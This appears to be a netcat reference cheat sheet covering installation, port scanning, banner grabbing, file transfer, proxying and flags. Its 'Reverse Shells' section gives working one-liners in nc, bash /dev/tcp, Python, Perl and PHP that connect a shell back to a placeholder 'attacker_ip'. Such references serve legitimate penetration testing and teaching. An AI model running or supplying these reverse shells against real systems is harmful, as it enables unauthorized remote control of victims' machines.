Netcat
Netcat (nc) is a versatile networking utility for reading and writing data across networks. Use it for port scanning, banner grabbing, reverse shells, and network debugging.
Installation
Linux/Ubuntu
# Install netcat
sudo apt update
sudo apt install netcat
# Or netcat-openbsd (more common)
sudo apt install netcat-openbsd
# Verify installation
nc -h
which ncmacOS
# Homebrew
brew install netcat
# Via MacPorts
sudo port install netcat
# Already installed on most Mac systemsWindows
# Using Chocolatey
choco install netcat
# Or download from:
# https://eternallybored.org/misc/netcat/Basic Operations
Connect to Remote Host
# Basic connection
nc example.com 80
# Connect with timeout
nc -w 5 example.com 80
# Connect with specific source IP
nc -s 192.168.1.100 example.com 80
# Verbose mode
nc -v example.com 80Listen on Port
# Listen on port 1234
nc -l 1234
# Listen on specific interface
nc -l -p 1234 -s 192.168.1.100
# Listen in verbose mode
nc -v -l 1234
# Listen and accept single connection
nc -l 1234Port Scanning
| Command | Description |
|---|---|
nc -zv example.com 22 | Scan single port |
nc -zv example.com 1-100 | Scan port range |
nc -zv -w 2 example.com 1-1000 | Scan with timeout |
nc -u -zv example.com 53 | UDP port scan |
Banner Grabbing
# Grab HTTP banner
nc example.com 80
GET / HTTP/1.1
Host: example.com
# Grab SSH banner
nc example.com 22
# Grab SMTP banner
nc example.com 25
QUIT
# Grab FTP banner
nc example.com 21
QUIT
# Save banner to file
nc -v example.com 80 < /dev/null 2>&1 | head -n 5 > banner.txtFile Transfer
Send File
# Sender: Listen and send file
nc -l 1234 < file.txt
# Receiver: Connect and receive
nc example.com 1234 > file.txt
# Alternative syntax
cat file.txt | nc -l 1234
# Bi-directional (tar over nc)
tar czf - /important/files | nc -l 1234Receive File
# Sender: Connect and send
nc example.com 1234 < file.txt
# Or with pipe
cat file.txt | nc example.com 1234
# Send directory
tar czf - /path/to/dir | nc example.com 1234
# Receiver side
nc -l 1234 | tar xzf -Reverse Shells
Basic Reverse Shell
# Attacker listener
nc -v -l 4444
# Victim connects back
nc attacker_ip 4444 -e /bin/bash
# or
nc attacker_ip 4444 -e /bin/sh
# Without -e flag (if disabled)
/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1Advanced Reverse Shells
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Perl reverse shell
perl -e 'use Socket;$i="attacker_ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# PHP reverse shell
php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/bash -i <&3 >&3 2>&3");'Chat & Communication
Simple Chat
# Terminal 1: Listen
nc -l 5555
# Terminal 2: Connect
nc localhost 5555
# Type messages in either terminalMultiple Connections
# Accept multiple connections
nc -l 5555 -k
# Or use -L (uppercase) on older versions
nc -L 5555UDP Operations
UDP Communication
# UDP listen
nc -u -l 1234
# UDP send
nc -u example.com 1234
# UDP with specific source port
nc -u -p 5555 example.com 1234
# UDP verbose
nc -u -v example.com 53Advanced Techniques
HTTP Request/Response
# Send HTTP GET request
(echo -e "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n"; sleep 1) | nc example.com 80
# Send POST request
(echo -e "POST /api HTTP/1.1\r\nHost: example.com\r\nContent-Length: 13\r\n\r\nkey=value"; sleep 1) | nc example.com 80
# Extract headers only
nc example.com 80 < request.txt | head -20Proxy/Relaying
# Simple proxy on port 8888 to remote:80
(while true; do nc -l 8888; done) | nc example.com 80
# Use mkfifo for two-way proxy
mkfifo fifo
nc -l 1234 < fifo | nc example.com 80 > fifo
rm fifoHex Dump
# Show traffic in hex
nc -v example.com 80 | od -c
# More detailed hex
nc -v example.com 80 | xxdPractical Examples
Port Scanning Script
#!/bin/bash
# Simple port scanner using netcat
host=$1
start_port=1
end_port=65535
for port in $(seq $start_port $end_port); do
(echo >/dev/tcp/$host/$port) 2>/dev/null && echo "Port $port: OPEN" &
done
waitReverse Shell Listener
#!/bin/bash
# Multi-shell reverse shell handler
PORT=4444
nc -v -l $PORTNetwork Monitor
#!/bin/bash
# Simple network packet monitor
iface=${1:-eth0}
nc -i 1 -n -l 0.0.0.0 9999File Transfer Script
#!/bin/bash
# Secure file transfer over nc
if [ "$1" = "send" ]; then
tar czf - "$2" | nc $3 $4
elif [ "$1" = "receive" ]; then
nc -l $2 | tar xzf -
fiCommon Flags
| Flag | Description |
|---|---|
-l | Listen mode (server) |
-p <port> | Specify source port |
-s <ip> | Specify source IP |
-u | UDP mode (default is TCP) |
-v | Verbose output |
-w <timeout> | Connection timeout |
-z | Zero-I/O mode (scanning) |
-e <program> | Execute program on connection |
-k | Keep listening after disconnect |
-n | No DNS lookups |
-4 | IPv4 only |
-6 | IPv6 only |
Troubleshooting
Common Issues
Connection Refused
# Check if port is actually open
nc -zv -w 2 host port
# Check listening ports
netstat -tlnpTimeout Issues
# Increase timeout
nc -w 10 host port
# Debug with verbose
nc -vv host portNo Response from Reverse Shell
# Check listener is active
nc -v -l 4444
# Check victim connectivity
nc -zv attacker_ip 4444Security Notes
- Netcat transmits data in plaintext
- Use for authorized testing only
- Consider using encrypted alternatives (SSH, OpenSSL)
- Monitor netcat processes:
ps aux | grep nc - Firewall nc listeners appropriately
- Document all security testing
- Use on authorized networks only
Alternatives
- socat: More powerful socket relay
- ncat: Improved netcat with encryption
- netcat6: IPv6 support
- cryptcat: Encrypted netcat
Last updated: 2025-03-30